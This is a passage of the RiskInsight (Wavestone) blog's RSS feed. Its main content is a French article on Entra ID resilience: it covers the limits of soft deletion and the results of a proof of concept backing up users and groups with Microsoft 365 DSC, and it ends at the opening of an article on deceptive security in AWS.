<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/07/ia-agentic-typologie-des-risques-et-principales-mesures-de-securite/">IA Agentique : typologie des risques et principales mesures de sécurité</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2025/07/ia-agentic-typologie-des-risques-et-principales-mesures-de-securite/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Résilience Entra ID</title>
		<link>https://www.riskinsight-wavestone.com/2025/07/resilience-entra-id/</link>
					<comments>https://www.riskinsight-wavestone.com/2025/07/resilience-entra-id/#respond</comments>
		
		<dc:creator><![CDATA[Pierre LALIN]]></dc:creator>
		<pubDate>Thu, 03 Jul 2025 13:54:39 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Eclairage]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Resilience]]></category>
		<category><![CDATA[Risk management]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=26512</guid>

					<description><![CDATA[<p>Entra ID (anciennement Azure AD) est une solution de gestion des identités et des accès. Celle-ci permet d’administrer le cycle de vie des différentes identités, allant d’utilisateurs à des appareils en passant par des applications. Contrairement à Microsoft Active Directory,...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/07/resilience-entra-id/">Résilience Entra ID</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p style="text-align: justify;"><span data-contrast="auto">Entra ID (anciennement Azure AD) est une solution de gestion des identités et des accès. Celle-ci permet d’administrer le cycle de vie des différentes identités, allant d’utilisateurs à des appareils en passant par des applications. Contrairement à Microsoft Active Directory, Entra ID étend ses capacités d&rsquo;authentification et d&rsquo;autorisation au-delà du réseau de l&rsquo;entreprise pour couvrir les applications SaaS, les workloads on-premises et Cloud utilisant des appareils appartenant à l&rsquo;entreprise ou BYOD. Ces nouvelles fonctionnalités et connexions sont obtenues grâce à des protocoles basés sur le web comme SAML et une structure d&rsquo;identité simplifiée (forêt AD vs locataire Entra ID).</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Dans cet article, nous mettrons en lumière le défi de la cyber-résilience d&rsquo;Entra ID, expliquerons pourquoi les fonctionnalités natives sont des solutions incomplètes et présenterons le résultat d&rsquo;un PoC mené sur un outil open-source, Microsoft 365 DSC, pour sauvegarder et récupérer les données d&rsquo;Entra ID.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p> </p>
<h2 style="text-align: justify;" aria-level="2"><b><span data-contrast="none">La résilience cyber dans les services Cloud managés</span></b><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h2>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">Avec Entra ID, la stratégie de gestion des répertoires est conforme au paradigme de l&rsquo;informatique dématérialisée. Cela signifie que les différentes couches de réseau, de stockage, de calcul, de système d&rsquo;exploitation et d&rsquo;application sont gérées par Microsoft, ce qui permet au client de se concentrer uniquement sur ses données d&rsquo;identité.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-26526 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Diapositive1.jpg" alt="Different technologies managed diffrently" width="1280" height="720" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Diapositive1.jpg 1280w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Diapositive1-340x191.jpg 340w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Diapositive1-69x39.jpg 69w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Diapositive1-768x432.jpg 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Diapositive1-800x450.jpg 800w" sizes="auto, (max-width: 1280px) 100vw, 1280px" /></p>
<p style="text-align: justify;"><span data-contrast="auto">Cette différence fondamentale a un impact sur la résilience du service. En effet, la création de snapshots pour sauvegarder l&rsquo;intégralité du système, qui est une pratique courante sur l’Active Directory (AD), n&rsquo;est pas native sur un service managé tel qu&rsquo;Entra ID. Ainsi, pour faire face à un scénario de reprise après sinistre lié à des activités malveillantes, nous ne pouvons compter que sur les fonctionnalités natives de Microsoft : le modèle de cycle de vie de l&rsquo;identité, le modèle d&rsquo;administration RBAC et les capacités d&rsquo;importation/exportation.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p> </p>
<h2 style="text-align: justify;" aria-level="2"><b><span data-contrast="none">Le modèle incomplet de soft deletion</span></b><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h2>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">Pour garantir la résilience, les services Cloud utilisent largement un mécanisme de soft delete, ou suppression logique. Son objectif principal est de pouvoir récupérer les données en cas de suppression accidentelle. Par exemple, dans le coffre-fort d&rsquo;Azure Recovery Service, la suppression logique est la dernière mesure de protection en cas de suppression intentionnelle ou non intentionnelle du coffre-fort. Combiné aux paramètres d&rsquo;immuabilité, le coffre-fort ne peut pas être effacé, quelles que soient les autorisations de l&rsquo;administrateur.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Dans Entra ID, le concept de suppression logique existe mais est insuffisant pour assurer la résilience des données pour deux raisons. D&rsquo;une part, il n&rsquo;y a pas de distinction de rôle entre la suppression logique et la suppression définitive, ni de rôle de récupération, c&rsquo;est-à-dire que les autorisations requises pour supprimer un objet sont suffisantes pour permettre une suppression permanente. D&rsquo;autre part, le cycle de vie des objets dans Entra ID (créer, gérer, supprimer) est régi par le même rôle :</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<ul style="text-align: justify;">
<li><span data-contrast="auto">Le rôle d&rsquo;administrateur utilisateurs permet de créer et de supprimer un utilisateur.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><span data-contrast="auto">Le rôle d&rsquo;administrateur applicatif en nuage permet d&rsquo;enregistrer une application, de configurer tous les aspects de l&rsquo;application et de supprimer définitivement l&rsquo;application.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><span data-contrast="auto">Le rôle d&rsquo;administrateur Cloud Device permet d&rsquo;ajouter un appareil, d’en configurer tous les aspects et de le désenregistrer.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
</ul>
<h2 aria-level="2"> </h2>
<h2 style="text-align: justify;" aria-level="2"><b><span data-contrast="none">L’impact d’une suppression sur Entra ID</span></b><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h2>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">La conception actuelle d&rsquo;Entra ID rend les rôles d&rsquo;administrateur utilisateurs, d&rsquo;authentification privilégiée, d&rsquo;application (on-premises ou Cloud), Intune et Windows 365 d&rsquo;autant plus critiques, car leur compromission peut entraîner la perte permanente des données d&rsquo;identité. L&rsquo;impact d&rsquo;une telle suppression peut être une perte d&rsquo;accès aux applications et aux données, une perte de permissions et une incapacité à administrer.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Bien que la suppression des utilisateurs hybrides synchronisés avec un AD on-premises soit réversible, des informations telles que l&rsquo;attribution de rôles seront perdues, ce qui menace le modèle de droits et d&rsquo;accès. Ce n&rsquo;est pas le cas pour les identités dans le Cloud, qui font généralement partie du plan de contrôle. Dans le cadre du modèle d&rsquo;accès de l&rsquo;entreprise, le plan de contrôle comprend les accès les plus sensibles, ce qui peut entraîner la compromission globale d&rsquo;un système d&rsquo;information.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Dans un scénario de reprise après sinistre, certains actifs sont plus critiques que d&rsquo;autres et doivent être sauvegardés en priorité. Il s&rsquo;agit notamment des éléments suivants :</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<ul style="text-align: justify;">
<li><span data-contrast="auto">Utilisateurs du Plan de contrôle, groupes and roles assignés</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><span data-contrast="auto">Applications d&rsquo;entreprise (service principal) avec des autorisations critiques sur Azure ou Microsoft 365</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><span data-contrast="auto">Postes de travail</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
</ul>
<h2 aria-level="2"> </h2>
<h2 style="text-align: justify;" aria-level="2"><b><span data-contrast="none">Comparaison des méthodes de sauvegarde open-source</span></b><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h2>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">Afin de réduire la probabilité d&rsquo;un risque de perte de données Entra ID à des fins malveillantes, la mise en place d&rsquo;une solution de sauvegarde semble indispensable, au moins pour le plan de contrôle afin de garder le contrôle sur le système d&rsquo;Information et le reconstruire. Nous avons donc analysé 3 méthodes open-source permettant d&rsquo;assurer la sauvegarde des données :</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<ul style="text-align: justify;">
<li><b><span data-contrast="none">Microsoft Graph PowerShell</span></b><span data-contrast="auto"> : une bibliothèque PowerShell pour les API Microsoft Graph. Vous pouvez créer vos propres scripts pour exporter et importer les attributs des objets Entra ID qui correspondent aux besoins de votre organisation.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><b><span data-contrast="none">Microsoft Entra Exporter </span></b><span data-contrast="auto">: un module PowerShell qui exporte une copie locale de certains attributs Entra ID (utilisateurs, applications, applications d’entreprise, rôles, etc.) dans un fichier JSON.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><b><span data-contrast="none">Microsoft 365 Desired State Configuration (DSC)</span></b><span data-contrast="auto"> : un module PowerShell pour la configuration déclarative, le déploiement et la gestion des services Microsoft 365.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
</ul>
<h2> </h2>
<h2 style="text-align: justify;"><b><span data-contrast="none">Sauvegarde des objets Entra ID avec Microsoft 365 DSC</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h2>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">Dans cette partie, nous allons expliquer comment nous avons testé la solution open source Microsoft 365 DSC et partager les résultats et conclusions obtenus.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p> </p>
<h3 style="text-align: justify;"><b><span data-contrast="none">Notre PoC</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h3>
<p style="text-align: justify;"><span data-contrast="auto">Microsoft 365 DSC permet de gérer la configuration et l’état des services Microsoft 365 selon une approche déclarative. En définissant l’état souhaité plutôt que les étapes spécifiques, il simplifie la gestion de configurations cloud complexes et assure la cohérence de l’environnement.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Dans le cadre d’un PoC, la population test déployée dans notre tenant est la suivante :</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<ul style="text-align: justify;">
<li><span data-contrast="auto">30 utilisateurs Cloud Only (générés aléatoirement par Microsoft lors de la création du tenant de test)</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><span data-contrast="auto">10 groupes de sécurité (attribués aléatoirement aux utilisateurs)</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
</ul>
<p style="text-align: justify;"><span data-contrast="auto">L’objectif de ce PoC est d’identifier les avantages et les limites de la solution à travers une série de cas d’usage testés et documentés :</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<table>
<tbody>
<tr>
<td style="text-align: center;" colspan="3" width="623">
<p><strong>Utilisateurs</strong></p>
</td>
</tr>
<tr>
<td style="text-align: center;" colspan="2" width="365">
<p><strong>Cas d’usage</strong></p>
</td>
<td style="text-align: center;" width="257">
<p><strong>Résultats</strong></p>
</td>
</tr>
<tr>
<td width="161">
<p><strong>Que se passe-t-il si l’on supprime un utilisateur puis que l’on restaure une sauvegarde ?</strong></p>
</td>
<td width="204">
<p>L’utilisateur revient-il avec toutes ses données ?<br />Son mot de passe est-il restauré ou remplacé ?<br />Ses informations reviennent-elles ?</p>
</td>
<td width="257">
<p>Tous les attributs liés aux utilisateurs supprimés ne sont pas restaurés. Toutefois, leur mot de passe est remplacé par un mot de passe par défaut. En cas d’incohérence, une erreur non-bloquante est générée dans le script, empêchant l’attribution d’attributs pointant vers des objets inexistants.<br />Si l’attribut “Ensure” de l’utilisateur est défini sur “Absent”, alors il ne sera pas restauré.</p>
</td>
</tr>
<tr>
<td width="161">
<p><strong>Que se passe-t-il si un utilisateur est désactivé alors qu’il est actif dans la sauvegarde ?</strong></p>
</td>
<td width="204">
<p>Est-il réactivé?</p>
</td>
<td rowspan="2" width="257">
<p>Il n’est pas possible de connaître l’état (actif ou désactivé) d’un utilisateur depuis la sauvegarde.<br />Selon le besoin, on peut définir le paramètre “Ensure” sur “Absent” ou “Present” pour assurer la cohérence entre l’état du tenant et l’export.</p>
<p><br />« Absent” : l’utilisateur est considéré comme désactivé et ne sera pas déployé à la restauration.<br /><br /></p>
<p>“Présent” : l’utilisateur est considéré comme actif et sera déployé.<br />Si l’on tente de restaurer un utilisateur marqué “Absent” qui n’existe pas dans Entra ID, une simple confirmation de non-existence est renvoyée.</p>
</td>
</tr>
<tr>
<td width="161">
<p><strong>Que se passe-t-il si un utilisateur est actif mais qu’il est désactivé dans la sauvegarde ?</strong></p>
</td>
<td width="204">
<p>Est-il désactivé ?</p>
</td>
</tr>
<tr>
<td width="161">
<p><strong>Que se passe-t-il si un utilisateur est ajouté, mais non présent dans la sauvegarde ?</strong></p>
</td>
<td width="204">
<p>Est-il supprimé ?</p>
<p>Ses données sont-elles conservées ?</p>
</td>
<td width="257">
<p>Aucun impact observé sur le nouvel utilisateur.</p>
</td>
</tr>
<tr>
<td width="161">
<p><strong>Que se passe-t-il si on effectue une sauvegarde sans modifier l’utilisateur ?</strong></p>
</td>
<td width="204">
<p>Si rien ne change, que se passe-t-il ?</p>
<p>Si seul un attribut (ex. un groupe) est supprimé, que se passe-t-il ?</p>
<p>Si un attribut est ajouté ?</p>
<p>Si un attribut est modifié (mot de passe) ?</p>
<p>Si un groupe auquel l’utilisateur appartenait est supprimé ?</p>
<p>Qu’en est-il des licences assignées si la sauvegarde est faite avant modification ?</p>
<p>Que se passe-t-il si le rôle de l’utilisateur est modifié avant la sauvegarde ?</p>
</td>
<td width="257">
<p>Le nom d’utilisateur sert à associer les attributs : s’il change, l’utilisateur ne peut plus être retrouvé dans la sauvegarde (sauf si modifié aussi dans celle-ci).</p>
<p>Les attributs présents dans la sauvegarde écrasent ceux existants. Le reste sera inchangé. Ainsi, tout attribut non inclus dans la sauvegarde reste inchangé.</p>
</td>
</tr>
</tbody>
</table>
<p> </p>
<table>
<tbody>
<tr>
<td style="text-align: center;" colspan="3" width="623">
<p><strong>Groupes</strong></p>
</td>
</tr>
<tr>
<td style="text-align: center;" colspan="2" width="365">
<p><strong>Cas d’usage</strong></p>
</td>
<td style="text-align: center;" width="257">
<p><strong>Résultats</strong></p>
</td>
</tr>
<tr>
<td width="161">
<p><strong>Que se passe-t-il si je supprime un groupe puis restaure une sauvegarde ?</strong></p>
</td>
<td width="204">
<p>Le groupe est-il restauré avec toutes ses données ?</p>
<p>Les membres sont-ils réintégrés ?</p>
<p>La sauvegarde contient-elle les liens membres/groupe ?</p>
<p>Tous les groupes sont-ils sauvegardés ?</p>
<p>Les droits internes au groupe sont-ils conservés ?</p>
</td>
<td width="257">
<p>Seuls les groupes de sécurité et les groupes Microsoft 365 avec le bon label de confidentialité sont sauvegardés.</p>
<p>La sauvegarde contient les membres et le propriétaire, mais pas les droits internes au groupe.</p>
<p>Il faut refaire la sauvegarde car le groupe recréé n’aura pas le même ID. La sauvegarde considère alors que le groupe n’existe pas.</p>
</td>
</tr>
<tr>
<td width="161">
<p><strong>Que se passe-t-il si je sauvegarde un groupe déjà existant mais dont certains attributs ont été modifiés ?</strong></p>
</td>
<td width="204">
<p>Que se passe-t-il si le nom a changé ?</p>
<p>Si un utilisateur a quitté le groupe après la sauvegarde ?</p>
<p>Si de nouveaux utilisateurs ont été ajoutés ?</p>
</td>
<td width="257">
<p>La sauvegarde écrase les anciens attributs à l’exception du nom.</p>
</td>
</tr>
<tr>
<td width="161">
<p><strong>Que se passe-t-il si un groupe existe dans le tenant mais pas dans la sauvegarde ?</strong></p>
</td>
<td width="204">
<p>Est-il supprimé ou impacté lors de la restauration ?        </p>
</td>
<td width="257">
<p>Aucun impact observé, hormis pour les informations définies dans le fichier de configuration.</p>
</td>
</tr>
</tbody>
</table>
<p style="text-align: justify;"><span data-contrast="auto">Le processus a nécessité la configuration d’un compte de service avec les autorisations appropriées (User.ReadWrite.All, Group.ReadWrite.All) sur Entra ID afin d’interagir avec l’API Microsoft Graph pour l’export et l’import des données.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:240}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Ces autorisations ont permis au compte de service de récupérer les configurations et données nécessaires depuis Entra ID et de les réimporter.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:240}"> </span></p>
<p> </p>
<h2 style="text-align: justify;"><b><span data-contrast="none">RÉSULTATS DU POC MICROSOFT 365 DSC</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h2>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">À l’issue des tests, nous avons pu rassembler des informations sur les atouts et les limites de la solution.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<h3 style="text-align: justify;"><b><span data-contrast="auto">Points positifs :</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120}"> </span></h3>
<ul style="text-align: justify;">
<li><b><span data-contrast="none">Sélection granulaire des configurations</span></b><span data-contrast="none"> : </span><span data-contrast="auto">La solution permet de cibler précisément les configurations à sauvegarder.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120}"> </span></li>
<li><b><span data-contrast="none">Restauration sans suppression</span></b><span data-contrast="none"> : </span><span data-contrast="auto">Les utilisateurs et groupes actuels sont conservés lors de la restauration, évitant les suppressions accidentelles.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120}"> </span></li>
<li><b><span data-contrast="none">Écrasement des attributs obsolètes</span></b><span data-contrast="none"> :</span><span data-contrast="auto"> Les attributs sauvegardés remplacent les anciens.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120}"> </span></li>
<li><b><span data-contrast="none">Format de stockage des données</span></b><span data-contrast="none"> : </span><span data-contrast="auto">Les données sont enregistrées en JSON, ce qui facilite leur manipulation.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120}"> </span></li>
<li><b><span data-contrast="none">Automatisation possible</span></b><span data-contrast="none"> : </span><span data-contrast="auto">Une fois les outils installés, la solution est facilement automatisable.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120}"> </span></li>
<li><b><span data-contrast="none">Supervision et alertes</span></b><span data-contrast="none"> : </span><span data-contrast="auto">Microsoft 365 DSC permet de surveiller la cohérence des données et de déclencher des alertes en cas de changements suspects.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120}"> </span></li>
<li><b><span data-contrast="none">Gestion des versions de snapshots</span></b><span data-contrast="none"> : </span><span data-contrast="auto">Il est possible de gérer plusieurs versions de snapshots de manière simple.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120}"> </span></li>
<li><b><span data-contrast="none">Journalisation détaillée</span></b><span data-contrast="none"> : </span><span data-contrast="auto">La solution permet de générer des journaux très détaillés, facilitant l’audit et le suivi.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120}"> </span></li>
</ul>
<h3> </h3>
<h3 style="text-align: justify;"><b><span data-contrast="auto">Limites identifiées :</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120}"> </span></h3>
<ul style="text-align: justify;">
<li><b><span data-contrast="none">Données incomplètes dans la sauvegarde</span></b><span data-contrast="none"> : </span><span data-contrast="auto">Tous les attributs ne sont pas capturés, entraînant une possible perte d’informations.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120}"> </span></li>
<li><b><span data-contrast="none">Limite de taille de sauvegarde</span></b><span data-contrast="none"> : </span><span data-contrast="auto">La taille est limitée à 11 Mo, ce qui peut être insuffisant pour des environnements plus vastes.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120}"> </span></li>
<li><b><span data-contrast="none">État de désactivation non enregistré</span></b><span data-contrast="none"> : </span><span data-contrast="auto">Les statuts de désactivation ne sont pas sauvegardés, pouvant entraîner la réactivation d’utilisateurs désactivés.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120}"> </span></li>
<li><b><span data-contrast="none">Données et identifiants non chiffrés</span></b><span data-contrast="none"> : </span><span data-contrast="auto">Les fichiers de sauvegarde contiennent des données sensibles non chiffrées.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120}"> </span></li>
<li><b><span data-contrast="none">Perte des IDs objets</span></b><span data-contrast="none"> : </span><span data-contrast="auto">Lors de l’import, les IDs sont perdus, ce qui peut générer des doublons lors d’imports ultérieurs.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120}"> </span></li>
<li><b><span data-contrast="none">Service Principal privilégié</span></b><span data-contrast="none"> : </span><span data-contrast="auto">Le service principal utilisé possède des droits étendus, ce qui peut poser des risques de sécurité si mal géré</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120}"> </span></li>
</ul>
<p style="text-align: justify;"><span data-contrast="auto">Il est important de noter que cet outil ne permet pas véritablement une “restauration” : il est possible de recréer les objets, mais pas de restaurer les services associés. En effet, les liens entre les nouveaux objets ID et les applications ne sont pas restaurables, ce qui constitue une limitation propre à Entra ID.</span><b><span data-contrast="auto"> </span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:240,&quot;335559739&quot;:120}"> </span></p>
<p> </p>
<h2 style="text-align: justify;"><b><span data-contrast="none">NOTRE AVIS SUR MICROSOFT 365 DSC </span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h2>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">Microsoft 365 DSC est un excellent outil pour des usages de base et pour la documentation, grâce à sa simplicité de prise en main et de déploiement dans des environnements de test. Il est également efficace comme outil de supervision grâce à sa gestion de version et ses journaux détaillés.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Cependant, il n’est pas adapté aux environnements de grande taille, en raison de ses limitations en termes de scalabilité, d’expérience utilisateur et de sécurité (notamment pour les configurations et les identifiants). Il peut également générer des incohérences ou des duplications, car les IDs objets, qui peuvent être référencés ailleurs, sont irrécupérables.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Des solutions complémentaires peuvent s’avérer nécessaires, comme des scripts pour le traitement des fichiers de configuration et pour garantir la cohérence des modifications, ainsi que des processus clairs de chiffrement et de sauvegarde.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Nous recommandons donc de toujours évaluer précisément les besoins, de planifier les développements complémentaires nécessaires, et d’utiliser principalement la solution à des fins de supervision et de tests.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Compte tenu des limites des outils open source de Microsoft, il peut être pertinent d’examiner les offres de fournisseurs tiers, tels que Semperis ou Quest, spécialistes du domaine. Ces alternatives pourraient répondre aux défis de scalabilité, de fiabilité et de sécurité, et offrir des options mieux adaptées à des environnements complexes. Il est important de rester ouvert à ces solutions et de les évaluer selon les besoins spécifiques de votre organisation.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/07/resilience-entra-id/">Résilience Entra ID</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2025/07/resilience-entra-id/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Deceptive Security : la solution pour une détection efficace dans le Cloud ? &#8211; Exemple d’application de la Deceptive dans le Cloud AWS </title>
		<link>https://www.riskinsight-wavestone.com/2024/02/deceptive-security-la-solution-pour-une-detection-efficace-dans-le-cloud-exemple-dapplication-de-la-deceptive-dans-le-cloud-aws/</link>
					<comments>https://www.riskinsight-wavestone.com/2024/02/deceptive-security-la-solution-pour-une-detection-efficace-dans-le-cloud-exemple-dapplication-de-la-deceptive-dans-le-cloud-aws/#respond</comments>
		
		<dc:creator><![CDATA[Etienne Lafore]]></dc:creator>
		<pubDate>Fri, 16 Feb 2024 16:57:19 +0000</pubDate>
				<category><![CDATA[Eclairage]]></category>
		<category><![CDATA[AWS]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[deceptive]]></category>
		<category><![CDATA[Deceptive security]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=22452</guid>

					<description><![CDATA[<p>Aujourd&#8217;hui, les cyber-attaques font partie de notre quotidien et deviennent de plus en plus nombreuses et sophistiquées.  Par ailleurs, nous évoluons vers des Systèmes d’Information construits sur une diversité d’environnements de plus en plus vaste, notamment grâce au Cloud, maintenant...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2024/02/deceptive-security-la-solution-pour-une-detection-efficace-dans-le-cloud-exemple-dapplication-de-la-deceptive-dans-le-cloud-aws/">Deceptive Security : la solution pour une détection efficace dans le Cloud ? &#8211; Exemple d’application de la Deceptive dans le Cloud AWS </a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p style="text-align: justify;"><span data-contrast="none">Aujourd&rsquo;hui, les cyber-attaques font partie de notre quotidien et deviennent de plus en plus nombreuses et sophistiquées.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Par ailleurs, nous évoluons vers des Systèmes d’Information construits sur une diversité d’environnements de plus en plus vaste, notamment grâce au </span><b><span data-contrast="none">Cloud, </span></b><span data-contrast="none">maintenant omniprésent dans les SI des entreprises. Cela leur permet d’élargir leurs capacités mais, d’un point de vue sécurité, accroît la surface et les risques d’attaques.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
